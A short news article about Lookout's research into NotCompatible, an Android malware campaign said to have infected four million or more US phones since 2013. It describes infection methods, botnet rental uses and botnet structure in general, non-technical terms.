Mobile Malware Campaign Affected More Than 4 Million Android Phones
The curse of virus, malicious software, and botnet has been upon PC users for years. Smartphones were safe from such attacks, but now they are not.
Lookout, a San Francisco mobile security company, conducted a research to find out different malicious activities that attacked smartphones. They came to know about a mobile malware campaign targeting Android users that managed to infect between four million and 4.5 million Americans since 2013.
Lookout has been looking into this malware campaign — called NotCompatible — for over two years. The security company reports that it has seen increasingly sophisticated versions of this malware. According to them, more than four million people living in United States encountered the malware since January of 2013.
Attackers use different techniques to infect users’ smartphones. One of doing that is by infecting legitimate websites. When the user visit the infected website from smartphones, they unintentionally download malicious code, and thus get their devices infected. This is called “drive-by-download.”
In another technique, attackers sent spam email to their victims from hijacked email accounts. Lookout researchers report that this technique successfully caused more than 20,000 infections a day. Another technique used by attackers makes users install malicious code by disguising it as security patches in emails.
In some cases, attackers showed weight loss solutions along with malware links in spam emails to Android users.
So what could the attacker do after infecting your smartphone? Well, your smartphone becomes a part of botnet. Botnet is a network of infected users that are in control of the attacker. Once you become part of botnet, the attacker can carry out different malicious activities using your smartphone and your bandwidth.
Lookout reports that the attackers of NotCompatible rented out the control of infected devices to the people who paid them. Those authorities used these infected devices to send out spam buy up event tickets in bulk from from Ticketmaster, Live Nation, EventShopper and Craigslist. Some used these infected devices to crack WordPress accounts.
Typically, botnet has three entities (machines). At the lowest layer are the infected devices (first entity). These devices are connected with each other and also with the Command and Control Server (second entity), which basically sends out commands to infected devices.
These commands are given to C&C Server by Bot Master (third entity) which is the main entity in control of the botnet.
Lookout says that NotCompatible is now in its third iteration. It is getting more complex as they have now added encryption between C&C Server and infected hosts, which makes it hard to crack the communication.
Moreover, modern botnets do not have static C&C servers. This means that for a moment one of the infected hosts will become C&C server, and some time later, another host will become C&C server and start controlling the botnet.
Lookout says the attackers use victims’ mobile data for which victims pay for. To add to the annoyance, infected smartphones experience battery drain as well.